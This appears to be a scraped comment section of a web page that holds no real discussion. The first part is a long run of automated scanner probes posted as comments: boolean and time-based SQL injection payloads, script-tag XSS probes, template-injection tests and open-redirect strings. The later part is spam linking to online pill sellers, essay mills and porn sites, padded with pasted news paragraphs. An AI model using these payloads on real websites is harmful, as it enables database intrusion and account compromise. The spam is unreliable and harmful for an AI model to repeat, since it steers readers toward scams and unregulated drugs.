)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

ukwvnddo
7/7/2019 11:33:54 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

ukwvnddo
7/7/2019 11:34:04 PM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lbiqycas
7/7/2019 11:34:12 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

lbiqycas
7/7/2019 11:34:16 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:34:19 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:34:22 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

rkndaucn
7/7/2019 11:34:52 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:34:55 PM

1'"

lbiqycas
7/7/2019 11:35:00 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:35:02 PM

\

lbiqycas
7/7/2019 11:35:04 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

rkndaucn
7/7/2019 11:35:06 PM

1����

lbiqycas
7/7/2019 11:35:09 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

rkndaucn
7/7/2019 11:35:11 PM

@@1PjQq

lbiqycas
7/7/2019 11:35:13 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

rkndaucn
7/7/2019 11:35:14 PM

JyI=

rkndaucn
7/7/2019 11:35:16 PM

�'�"

rkndaucn
7/7/2019 11:35:19 PM

�''�""

rkndaucn
7/7/2019 11:35:22 PM

(select convert(int,CHAR(65)))

ebvqvbya
7/7/2019 11:35:25 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:35:28 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:35:32 PM

-1 OR 2+438-438-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:35:35 PM

-1 OR 3+438-438-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:35:39 PM

-1 OR 3*2<(0+5+438-438) --

ebvqvbya
7/7/2019 11:35:43 PM

-1 OR 3*2>(0+5+438-438) --

ebvqvbya
7/7/2019 11:35:46 PM

-1 OR 2+437-437-1=0+0+0+1

ebvqvbya
7/7/2019 11:35:48 PM

-1 OR 3+437-437-1=0+0+0+1

lbiqycas
7/7/2019 11:35:49 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:35:51 PM

-1 OR 3*2<(0+5+437-437)

lbiqycas
7/7/2019 11:35:52 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

ebvqvbya
7/7/2019 11:35:55 PM

-1 OR 3*2>(0+5+437-437)

lbiqycas
7/7/2019 11:35:55 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx

lbiqycas
7/7/2019 11:35:58 PM

iso-linh-vuc-tu-phap_n58392_g798.aspx/.

ebvqvbya
7/7/2019 11:35:59 PM

-1' OR 2+756-756-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:36:08 PM

-1' OR 3+756-756-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:36:10 PM

-1' OR 3*2<(0+5+756-756) --

ebvqvbya
7/7/2019 11:36:13 PM

-1' OR 3*2>(0+5+756-756) --

ebvqvbya
7/7/2019 11:36:18 PM

-1' OR 2+582-582-1=0+0+0+1 or '030OMNsM'='

ebvqvbya
7/7/2019 11:36:21 PM

-1' OR 3+582-582-1=0+0+0+1 or '030OMNsM'='

ebvqvbya
7/7/2019 11:36:24 PM

-1' OR 3*2<(0+5+582-582) or '030OMNsM'='

ebvqvbya
7/7/2019 11:36:27 PM

-1' OR 3*2>(0+5+582-582) or '030OMNsM'='

ebvqvbya
7/7/2019 11:36:30 PM

-1" OR 2+512-512-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:36:33 PM

-1" OR 3+512-512-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:36:36 PM

-1" OR 3*2<(0+5+512-512) --

ebvqvbya
7/7/2019 11:36:40 PM

-1" OR 3*2>(0+5+512-512) --

rkndaucn
7/7/2019 11:36:43 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:36:47 PM

1'"

ebvqvbya
7/7/2019 11:36:49 PM

if(now()=sysdate(),sleep(66),0)/*'XOR(if(now()=sysdate(),sleep(66),0))OR'"XOR(if(now()=sysdate(),sleep(66),0))OR"*/

rkndaucn
7/7/2019 11:36:50 PM

\

ebvqvbya
7/7/2019 11:36:51 PM

(select(0)from(select(sleep(66)))v)/*'+(select(0)from(select(sleep(66)))v)+'"+(select(0)from(select(sleep(66)))v)+"*/

rkndaucn
7/7/2019 11:36:52 PM

1����

ebvqvbya
7/7/2019 11:36:53 PM

1 waitfor delay '0:0:99' --

rkndaucn
7/7/2019 11:36:55 PM

@@tCGbj

ebvqvbya
7/7/2019 11:36:56 PM

OCb104WY'; waitfor delay '0:0:99' --

rkndaucn
7/7/2019 11:36:57 PM

JyI=

ebvqvbya
7/7/2019 11:36:59 PM

nHpimk4i'); waitfor delay '0:0:99' --

rkndaucn
7/7/2019 11:37:00 PM

�'�"

ebvqvbya
7/7/2019 11:37:02 PM

lmxoWLpD')); waitfor delay '0:0:33' --

rkndaucn
7/7/2019 11:37:03 PM

�''�""

ebvqvbya
7/7/2019 11:37:05 PM

k1ygZMXJ';select pg_sleep(33); --

rkndaucn
7/7/2019 11:37:06 PM

(select convert(int,CHAR(65)))

dihxxnfj
7/7/2019 11:37:07 PM

/www.vulnweb.com

ebvqvbya
7/7/2019 11:37:08 PM

OLOO9CeC');select pg_sleep(66); --

dihxxnfj
7/7/2019 11:37:09 PM

926079

ebvqvbya
7/7/2019 11:37:10 PM

3mLfCcva'));select pg_sleep(66); --

dihxxnfj
7/7/2019 11:37:11 PM

http://www.vulnweb.com

dihxxnfj
7/7/2019 11:37:17 PM

//www.vulnweb.com

gponcesp
7/7/2019 11:37:18 PM

'"

dihxxnfj
7/7/2019 11:37:20 PM

/\www.vulnweb.com

gponcesp
7/7/2019 11:37:37 PM

'"

gponcesp
7/7/2019 11:37:50 PM

'"

dihxxnfj
7/7/2019 11:38:01 PM

/www.vulnweb.com

gponcesp
7/7/2019 11:38:05 PM

'"

dihxxnfj
7/7/2019 11:38:06 PM

957339

dihxxnfj
7/7/2019 11:38:12 PM

http://www.vulnweb.com

dihxxnfj
7/7/2019 11:38:14 PM

//www.vulnweb.com

gponcesp
7/7/2019 11:38:19 PM

'"

dihxxnfj
7/7/2019 11:38:23 PM

/\www.vulnweb.com

rkndaucn
7/7/2019 11:38:27 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:38:30 PM

1'"

rkndaucn
7/7/2019 11:38:33 PM

\

rkndaucn
7/7/2019 11:38:36 PM

1����

gponcesp
7/7/2019 11:38:37 PM

'"

rkndaucn
7/7/2019 11:38:39 PM

@@gzN1p

rkndaucn
7/7/2019 11:38:42 PM

JyI=

rkndaucn
7/7/2019 11:38:45 PM

�'�"

rkndaucn
7/7/2019 11:38:48 PM

�''�""

rkndaucn
7/7/2019 11:38:54 PM

(select convert(int,CHAR(65)))

gponcesp
7/7/2019 11:38:57 PM

'"

dihxxnfj
7/7/2019 11:39:09 PM

/www.vulnweb.com

dihxxnfj
7/7/2019 11:39:12 PM

991265

dihxxnfj
7/7/2019 11:39:14 PM

http://www.vulnweb.com

dihxxnfj
7/7/2019 11:39:18 PM

//www.vulnweb.com

gponcesp
7/7/2019 11:39:18 PM

'"

dihxxnfj
7/7/2019 11:39:21 PM

/\www.vulnweb.com

dxiasasd
7/7/2019 11:39:25 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n_9720

dxiasasd
7/7/2019 11:39:29 PM

acu4568<s1﹥s2ʺs3ʹuca4568

gponcesp
7/7/2019 11:39:34 PM

'"

dxiasasd
7/7/2019 11:39:35 PM

acux5772��z1��z2a�bcxuca5772

dxiasasd
7/7/2019 11:39:41 PM

CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

dxiasasd
7/7/2019 11:39:44 PM

{{9999771*9999314}}

ebvqvbya
7/7/2019 11:39:51 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:39:55 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

dihxxnfj
7/7/2019 11:39:56 PM

/www.vulnweb.com

ebvqvbya
7/7/2019 11:39:58 PM

-1 OR 2+180-180-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:40:01 PM

-1 OR 3+180-180-1=0+0+0+1 --

dihxxnfj
7/7/2019 11:40:02 PM

982314

ebvqvbya
7/7/2019 11:40:03 PM

-1 OR 3*2<(0+5+180-180) --

dihxxnfj
7/7/2019 11:40:04 PM

http://www.vulnweb.com

ebvqvbya
7/7/2019 11:40:06 PM

-1 OR 3*2>(0+5+180-180) --

dihxxnfj
7/7/2019 11:40:08 PM

//www.vulnweb.com

ebvqvbya
7/7/2019 11:40:09 PM

-1 OR 2+278-278-1=0+0+0+1

dihxxnfj
7/7/2019 11:40:11 PM

/\www.vulnweb.com

dxiasasd
7/7/2019 11:40:12 PM

%25%32%36%25%32%33%32%32%31%3B%25%32%30%6B%69%25%65%31%25%62%61%25%62%66%6E%25%32%30%63%25%65%31%25%62%62%25%61%37%61%25%32%30%62%25%65%31%25%62%61%25%61%31%6E%3C%53%63%52%69%50%74%20%3E%67%4A%34%61%289243%29%3C%2F%73%43%72%69%70%54%3E

ebvqvbya
7/7/2019 11:40:13 PM

-1 OR 3+278-278-1=0+0+0+1

ebvqvbya
7/7/2019 11:40:17 PM

-1 OR 3*2<(0+5+278-278)

ebvqvbya
7/7/2019 11:40:19 PM

-1 OR 3*2>(0+5+278-278)

dxiasasd
7/7/2019 11:40:20 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n<ScRiPt>gJ4a(9465)</sCripT>

ebvqvbya
7/7/2019 11:40:23 PM

-1' OR 2+375-375-1=0+0+0+1 --

dxiasasd
7/7/2019 11:40:24 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n<%div style=width:expression(gJ4a(9756))>

ebvqvbya
7/7/2019 11:40:26 PM

-1' OR 3+375-375-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:40:30 PM

-1' OR 3*2<(0+5+375-375) --

ebvqvbya
7/7/2019 11:40:33 PM

-1' OR 3*2>(0+5+375-375) --

rkndaucn
7/7/2019 11:40:36 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:40:37 PM

-1' OR 2+598-598-1=0+0+0+1 or 'rJyXtyy4'='

rkndaucn
7/7/2019 11:40:38 PM

1'"

ebvqvbya
7/7/2019 11:40:39 PM

-1' OR 3+598-598-1=0+0+0+1 or 'rJyXtyy4'='

rkndaucn
7/7/2019 11:40:41 PM

\

ebvqvbya
7/7/2019 11:40:42 PM

-1' OR 3*2<(0+5+598-598) or 'rJyXtyy4'='

rkndaucn
7/7/2019 11:40:43 PM

1����

ebvqvbya
7/7/2019 11:40:45 PM

-1' OR 3*2>(0+5+598-598) or 'rJyXtyy4'='

rkndaucn
7/7/2019 11:40:46 PM

@@D36vc

dihxxnfj
7/7/2019 11:40:47 PM

/www.vulnweb.com

ebvqvbya
7/7/2019 11:40:48 PM

-1" OR 2+877-877-1=0+0+0+1 --

rkndaucn
7/7/2019 11:40:49 PM

JyI=

ebvqvbya
7/7/2019 11:40:52 PM

-1" OR 3+877-877-1=0+0+0+1 --

rkndaucn
7/7/2019 11:40:53 PM

�'�"

dihxxnfj
7/7/2019 11:40:53 PM

937979

ebvqvbya
7/7/2019 11:40:54 PM

-1" OR 3*2<(0+5+877-877) --

dihxxnfj
7/7/2019 11:40:55 PM

http://www.vulnweb.com

ebvqvbya
7/7/2019 11:40:57 PM

-1" OR 3*2>(0+5+877-877) --

dihxxnfj
7/7/2019 11:40:58 PM

//www.vulnweb.com

rkndaucn
7/7/2019 11:40:59 PM

�''�""

ebvqvbya
7/7/2019 11:41:00 PM

if(now()=sysdate(),sleep(74),0)/*'XOR(if(now()=sysdate(),sleep(74),0))OR'"XOR(if(now()=sysdate(),sleep(74),0))OR"*/

dihxxnfj
7/7/2019 11:41:01 PM

/\www.vulnweb.com

rkndaucn
7/7/2019 11:41:01 PM

(select convert(int,CHAR(65)))

ebvqvbya
7/7/2019 11:41:02 PM

(select(0)from(select(sleep(111)))v)/*'+(select(0)from(select(sleep(111)))v)+'"+(select(0)from(select(sleep(111)))v)+"*/

ebvqvbya
7/7/2019 11:41:04 PM

1 waitfor delay '0:0:111' --

ebvqvbya
7/7/2019 11:41:07 PM

Wtp10J7f'; waitfor delay '0:0:111' --

ebvqvbya
7/7/2019 11:41:10 PM

AjYLIMIa'); waitfor delay '0:0:111' --

ebvqvbya
7/7/2019 11:41:13 PM

8ofREA6F')); waitfor delay '0:0:111' --

ebvqvbya
7/7/2019 11:41:15 PM

8jh4umwV';select pg_sleep(111); --

ebvqvbya
7/7/2019 11:41:17 PM

1tCWVxu6');select pg_sleep(37); --

ebvqvbya
7/7/2019 11:41:20 PM

7yLa6kOe'));select pg_sleep(37); --

dihxxnfj
7/7/2019 11:41:43 PM

/www.vulnweb.com

dihxxnfj
7/7/2019 11:41:46 PM

954331

dihxxnfj
7/7/2019 11:41:49 PM

http://www.vulnweb.com

dihxxnfj
7/7/2019 11:41:52 PM

//www.vulnweb.com

dihxxnfj
7/7/2019 11:41:58 PM

/\www.vulnweb.com

rkndaucn
7/7/2019 11:42:28 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:42:33 PM

1'"

dihxxnfj
7/7/2019 11:42:35 PM

/www.vulnweb.com

rkndaucn
7/7/2019 11:42:35 PM

\

dihxxnfj
7/7/2019 11:42:37 PM

968475

rkndaucn
7/7/2019 11:42:38 PM

1����

dihxxnfj
7/7/2019 11:42:40 PM

http://www.vulnweb.com

rkndaucn
7/7/2019 11:42:40 PM

@@j9g7E

dihxxnfj
7/7/2019 11:42:43 PM

//www.vulnweb.com

rkndaucn
7/7/2019 11:42:43 PM

JyI=

dihxxnfj
7/7/2019 11:42:46 PM

/\www.vulnweb.com

rkndaucn
7/7/2019 11:42:47 PM

�'�"

rkndaucn
7/7/2019 11:42:49 PM

�''�""

rkndaucn
7/7/2019 11:42:51 PM

(select convert(int,CHAR(65)))

dihxxnfj
7/7/2019 11:43:18 PM

/www.vulnweb.com

dihxxnfj
7/7/2019 11:43:21 PM

987183

dihxxnfj
7/7/2019 11:43:24 PM

http://www.vulnweb.com

dihxxnfj
7/7/2019 11:43:29 PM

//www.vulnweb.com

dihxxnfj
7/7/2019 11:43:32 PM

/\www.vulnweb.com

ebvqvbya
7/7/2019 11:43:50 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:43:54 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:43:58 PM

-1 OR 2+39-39-1=0+0+0+1 --

dihxxnfj
7/7/2019 11:43:59 PM

/www.vulnweb.com

ebvqvbya
7/7/2019 11:44:01 PM

-1 OR 3+39-39-1=0+0+0+1 --

dihxxnfj
7/7/2019 11:44:02 PM

951970

ebvqvbya
7/7/2019 11:44:04 PM

-1 OR 3*2<(0+5+39-39) --

dihxxnfj
7/7/2019 11:44:06 PM

http://www.vulnweb.com

ebvqvbya
7/7/2019 11:44:07 PM

-1 OR 3*2>(0+5+39-39) --

dihxxnfj
7/7/2019 11:44:09 PM

//www.vulnweb.com

ebvqvbya
7/7/2019 11:44:10 PM

-1 OR 2+481-481-1=0+0+0+1

ebvqvbya
7/7/2019 11:44:13 PM

-1 OR 3+481-481-1=0+0+0+1

dihxxnfj
7/7/2019 11:44:14 PM

/\www.vulnweb.com

rkndaucn
7/7/2019 11:44:15 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

ebvqvbya
7/7/2019 11:44:16 PM

-1 OR 3*2<(0+5+481-481)

ebvqvbya
7/7/2019 11:44:19 PM

-1 OR 3*2>(0+5+481-481)

rkndaucn
7/7/2019 11:44:21 PM

1'"

ebvqvbya
7/7/2019 11:44:24 PM

-1' OR 2+713-713-1=0+0+0+1 --

rkndaucn
7/7/2019 11:44:25 PM

\

ebvqvbya
7/7/2019 11:44:27 PM

-1' OR 3+713-713-1=0+0+0+1 --

rkndaucn
7/7/2019 11:44:28 PM

1����

ebvqvbya
7/7/2019 11:44:30 PM

-1' OR 3*2<(0+5+713-713) --

rkndaucn
7/7/2019 11:44:32 PM

@@NiWw7

ebvqvbya
7/7/2019 11:44:35 PM

-1' OR 3*2>(0+5+713-713) --

rkndaucn
7/7/2019 11:44:36 PM

JyI=

rkndaucn
7/7/2019 11:44:39 PM

�'�"

ebvqvbya
7/7/2019 11:44:41 PM

-1' OR 2+916-916-1=0+0+0+1 or 'vYLvWMfz'='

rkndaucn
7/7/2019 11:44:42 PM

�''�""

rkndaucn
7/7/2019 11:44:45 PM

(select convert(int,CHAR(65)))

ebvqvbya
7/7/2019 11:44:45 PM

-1' OR 3+916-916-1=0+0+0+1 or 'vYLvWMfz'='

ebvqvbya
7/7/2019 11:44:50 PM

-1' OR 3*2<(0+5+916-916) or 'vYLvWMfz'='

ebvqvbya
7/7/2019 11:44:53 PM

-1' OR 3*2>(0+5+916-916) or 'vYLvWMfz'='

ebvqvbya
7/7/2019 11:44:56 PM

-1" OR 2+862-862-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:44:58 PM

-1" OR 3+862-862-1=0+0+0+1 --

ebvqvbya
7/7/2019 11:45:03 PM

-1" OR 3*2<(0+5+862-862) --

ebvqvbya
7/7/2019 11:45:08 PM

-1" OR 3*2>(0+5+862-862) --

ebvqvbya
7/7/2019 11:45:12 PM

if(now()=sysdate(),sleep(82),0)/*'XOR(if(now()=sysdate(),sleep(82),0))OR'"XOR(if(now()=sysdate(),sleep(82),0))OR"*/

ebvqvbya
7/7/2019 11:45:14 PM

(select(0)from(select(sleep(123)))v)/*'+(select(0)from(select(sleep(123)))v)+'"+(select(0)from(select(sleep(123)))v)+"*/

ebvqvbya
7/7/2019 11:45:17 PM

1 waitfor delay '0:0:123' --

ebvqvbya
7/7/2019 11:45:20 PM

cBjKEplF'; waitfor delay '0:0:123' --

ebvqvbya
7/7/2019 11:45:22 PM

LrurtfEL'); waitfor delay '0:0:123' --

ebvqvbya
7/7/2019 11:45:25 PM

5N84v6MZ')); waitfor delay '0:0:123' --

ebvqvbya
7/7/2019 11:45:27 PM

Fwuqb943';select pg_sleep(123); --

ebvqvbya
7/7/2019 11:45:30 PM

2OHX7uts');select pg_sleep(41); --

ebvqvbya
7/7/2019 11:45:35 PM

R6DoUDo4'));select pg_sleep(41); --

rkndaucn
7/7/2019 11:46:09 PM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

rkndaucn
7/7/2019 11:46:12 PM

1'"

rkndaucn
7/7/2019 11:46:16 PM

\

rkndaucn
7/7/2019 11:46:18 PM

1����

rkndaucn
7/7/2019 11:46:21 PM

@@cHYSz

rkndaucn
7/7/2019 11:46:25 PM

JyI=

rkndaucn
7/7/2019 11:46:27 PM

�'�"

rkndaucn
7/7/2019 11:46:30 PM

�''�""

rkndaucn
7/7/2019 11:46:34 PM

(select convert(int,CHAR(65)))

JOh2m
9/22/2020 2:32:23 PM

ClIrKl buy cheap cialis http://pills2sale.com/

1vC0QY
9/30/2020 8:58:30 PM

mn8fyC buy viagra online http://pills2sale.com/

UjjhFF
10/8/2020 8:42:49 PM

ZdXF6Y http://pills2sale.com/ cheap viagra

e3p0U
10/19/2020 1:38:29 AM

9wNg9h http://pills2sale.com/ levitra nizagara

rnMEcE
12/4/2020 9:53:11 AM

jEbx8t https://www.quora.com/What-the-top-SEO-keywords-for-essay-you-know/answer/Alan-Smith-1772 write my essay

rnKnwx
12/12/2020 10:21:30 AM

rF2uyX http://pills2sale.com/fTr1bYnau88IsQx

Ep4Dpm
6/29/2021 3:59:14 PM

kjZbUf https://xnxxx.web.fc2.com/ xnxx

zrTjQn
7/23/2021 5:43:55 AM

write my essays writemypaper.online

9TDDi
8/3/2021 9:59:27 PM

https://beeg.x.fc2.com/sitemap1.html https://beeg.x.fc2.com/sitemap2.html https://xnxxx.web.fc2.com/sitemap1.html https://xnxxx.web.fc2.com/sitemap2.html https://xvideoss.web.fc2.com/sitemap1.html https://xvideoss.web.fc2.com/sitemap2.html

qgocj
8/3/2021 10:07:54 PM

https://xvideoss.web.fc2.com/

WPWIn
8/12/2021 5:05:25 AM

Incorrect PIN http://tubearchive.online lamalinks In a marked departure from other recent politically charged trials, which are typically understood to be closely choreographed proceedings, Bo launched an unusually vigorous defense during his trial last month.

ONudF
8/12/2021 5:05:34 AM

Can I use your phone? http://tuberating.online xnxx We have failed to broaden the debate to look at empowering girls and women from the start, educating our society in schools and through massive spending in public awareness campaigns on gender equality and not enforcing the laws we have enacted to protect our women.

weC6Qf
8/12/2021 5:05:42 AM

Incorrect PIN http://xnxxlist.online rulertube The school was recognized Tuesday by the Physicians Committee for Responsible Medicine, a Washington, D.C.-based advocacy group that promotes plant-based diets, for becoming the country’s first public school to serve vegetarian-only meals in its cafeteria.

K6Q2N
8/12/2021 5:05:50 AM

I'll call back later http://xnxxlist.online pof "It (the speech) is very brave, it is very positive and it is one I am absolutely committed to engaging in," he told the BBC News Channel. "The vision of more working people, ordinary trade unionists, actively involved in the Labour party is something which is very central to Unite."

jrmDL
8/12/2021 5:05:58 AM

I've got a part-time job http://tubearchive.online nudevista After seven years, two trials and a 5-million-pound bill,the Financial Conduct Authority has had to abandon theprosecution of three former directors of iSoft Group PtyLtd saying that it would not seek a third trial of theexecutives on charges that they misled investors in the oncehigh-flying Manchester-based software company.

MIyv3t
11/16/2021 2:22:54 PM

I don't know what I want to do after university http://kiryu.deci.jp/web/sentai/log/eid63.html stromectol ivermectin Yuval Steinitz, minister responsible for international relations, told Israeli public radio that the deal adhered to the principles set out by Prime Minister Benjamin Netanyahu for kick-starting the talks.

gEg4Y3
11/16/2021 3:57:42 PM

Very funny pictures http://argee.com/portfolio-view/in-faucibus-risus/ stromectol ivermectin I am the soft easy ticket for any middle-aged people that are knocking around thinking, I just want to see one thing before dinner. Or the parents that are coming up to see their teenagers do experimental dance pieces and just want to see something they understand. I will take the mums and dads who are wandering around looking a bit dazed.

5MWERD
11/16/2021 3:57:47 PM

US dollars http://wcrg.nmsu.edu/waterresearch/2016/03/14/hello-world/ stromectol ivermectin Republicans offered a new approach on Tuesday to resolve thefiscal standoff, proposing creation of a bipartisan panel towork on deficit reduction and find ways to end the governmentshutdown and make recommendations on a debt-limit increase.

Ifttp
11/16/2021 3:57:51 PM

How much is a First Class stamp? http://nashsindrom.ru/node/14238/edit stromectol ivermectin Global drug revenue jumped almost 10 percent to $7.04billion, repeating the strong performance seen in the priorquarter, on soaring sales of its Simponi and Remicade treatmentsfor rheumatoid arthritis, Stelara for psoriasis, its Zytiga drugfor prostate cancer and other medicines.

19rc0
11/16/2021 3:57:55 PM

On another call http://taste.com.ar/hello-summer-2018/ stromectol ivermectin ** Italy's telecommunications regulator AGCOM will examineand probably give preliminary approval for Telecom Italia SpA's planned spin-off of its fixed-line network onThursday, two sources with knowledge of the process toldReuters.

oRpcx
11/16/2021 3:57:59 PM

In tens, please (ten pound notes) http://kiansacity.go.th/html/question.asp?ID=52 stromectol ivermectin If the clock were turned back a decade, and his Bombers were entrenched in fourth place in the AL East like they are now — 11½ games behind, gulp, the division-leading and long-hated Red Sox — George Steinbrenner would have likely blown a gasket or two, and would have had plenty to say about his embattled $275 million third baseman.

fcVvi
11/16/2021 4:57:37 PM

Could you ask her to call me? http://www.puring.net/bbs/view.php?id=board6&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=29&PHPSESSID=f8d625dc0567b5e1ad36d608fe4c6751 stromectol ivermectin While the $875 million it cashed in from selling the 26percent stake in its Kazakh rival will help Kazakhmys to cutdebt that soared to $1.3 billion at end-June, the transactionconfirmed how far the value of its asset had dropped.

sRrDZ
11/16/2021 4:57:51 PM

Have you got any experience? http://aidstomsk.ru/index.php/component/k2/item/6 stromectol ivermectin "Their hypocrisy knows no bounds. By their own admission, the Tories would slash a whopping 12.5% from local authority budgets next year - a cut that would create unprecedented damage on public services all over Wales."

ERhAK
11/16/2021 4:58:03 PM

I'd like to speak to someone about a mortgage http://kiansacity.go.th/html/question.asp?ID=82 stromectol ivermectin Quincy had a moratorium in place, but it ended in June when the city passed a zoning ordinance banning the cultivation or sale of medical marijuana within 1,500 feet of a residential district, school, child care center, liquor-selling establishment or another marijuana dispensary.

L3B1wf
11/16/2021 4:58:08 PM

What's your number? http://gagani.jp/cgi-bin/resbbspro99/resbbspro.cgi stromectol ivermectin Selig would base a ban on evidence gathered by baseball's investigators that show Rodriguez violated the drug program in 2010, 2011 and 2012, and possibly longer, and that he interfered with Selig's investigation. Rodriguez's treatment by Galea, a Toronto doctor who pleaded guilty to bringing unapproved drugs, including HGH, into the United States to treat pro athletes, might also be used against him. Evidence in that case remains sealed in U.S. District Court in Buffalo but if baseball is dragged into a federal lawsuit, it would move to unseal those records as a part of its defense. The U.S. Attorney in Miami is also investigating Biogenesis, meaning Rodriguez could be called as a witness and questioned under oath.

zCkcUW
11/16/2021 4:58:20 PM

Yes, I play the guitar http://aysp.hp2.jp/bbs/bbs.php stromectol ivermectin The deal, which will reduce the French firm's stake to 12percent from 61 percent, fulfills Kotick's longstanding wish tobuy back the company he had built into a games powerhouse since1991. Activision merged with Vivendi's games division in 2007.

pcVgP
11/17/2021 12:08:15 AM

How much is a Second Class stamp? http://choyoungelecom.cafe24.com/bbs/view.php?id=custom2&page=1&sn1=&divpage=2&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=12514&PHPSESSID=a73178910916c8652621bf1acaa96d1a stromectol ivermectin The Pay Our Military Act — which Congress passed on Sept. 30 — might allow DoD officials to attend conferences. However, no formal guidance has been issued. The act allowed DoD to bring back 90 percent of 350,000 civilians being furloughed.

VkBb7
11/17/2021 2:19:33 AM

Do you have any exams coming up? http://kb50.net/1_home/board/board_r.asp?kind=free&b_id=20079&page=1 stromectol ivermectin Another reason it's tough to simply do an apples-to-apples comparison is that insurers can currently decline people who apply for coverage at the rates shown here. Rhode Island has very low rates of decline and also doesn't allow what's called up-rating, according to HealthPocket. In the other states, however, between 16 and 21 percent of all applications for individual and family policies are declined, and the rejection rates for some insurers approach 90 percent. These rates will fall to zero under Obamacare.

s230Qi
11/17/2021 2:19:40 AM

We used to work together http://museuegipcioerosacruz.org.br/author/ stromectol ivermectin These fledgling woodlands had the capacity to store 50 metric tons of carbon per hectare (2.47 acres), which equates to roughly 185 tons of carbon dioxide, or the exhaust of some 21,285 gallons of gasoline. That much fuel would take the average car in the United States more than half a million miles. Though the legumes' nitrogen fertilizer output waned in later years, the species nonetheless took up carbon at rates that were up to nine times faster than non-legume trees.

hsI7n
11/17/2021 2:19:54 AM

What sort of work do you do? http://xwall.co.kr/new/community/func.html?code=func&pmode=view&no=2 stromectol ivermectin Haggis, 60, has been a polarizing figure since "Crash," an ensemble drama about racial and social tensions in Los Angeles, which upset critically acclaimed gay cowboy drama "Brokeback Mountain" to win the best picture Academy Award.

Y4Ekyk
11/17/2021 2:20:07 AM

I'd like to transfer some money to this account http://neonretrorecords.com/silance-chimeras-lp-2020/ stromectol ivermectin Beyond the Kinetics Desk's feature set it is a classy and elegant, if plain, piece of furniture. The surface is made up of a birch core with either a hard-coated glossy polymer or hardwood finish. Unfortunately, I didn't get to see the hardwood finish; the glossy polymer feels sturdy and is certainly easy to clean, but a wooden surface would likely be quite a bit more eye-catching. The top is Spartan aside from the lower-left side touchscreen and, on either side of the desk's surface, two ports for AC and USB outlets. A single power cord extends from the back and provides all the juice the desk needs. Another option for buyers is one of five accent colors for the desk's underside, power cord, and outlet compartments — the green option I saw definitely looked like it would match well with a new iPhone 5C.

2jHU6
11/17/2021 2:20:23 AM

I went to http://www.coach-ecogestion.fr/a-simple-text-post/ stromectol ivermectin It is thought a substitute teacher at St Matthew's C of E Primary School in Bradford was handing out chocolates because it was a child's birthday and handed Rehan the 'Big Purple One' from a selection box.

jdeOQi
4/4/2022 9:49:21 AM

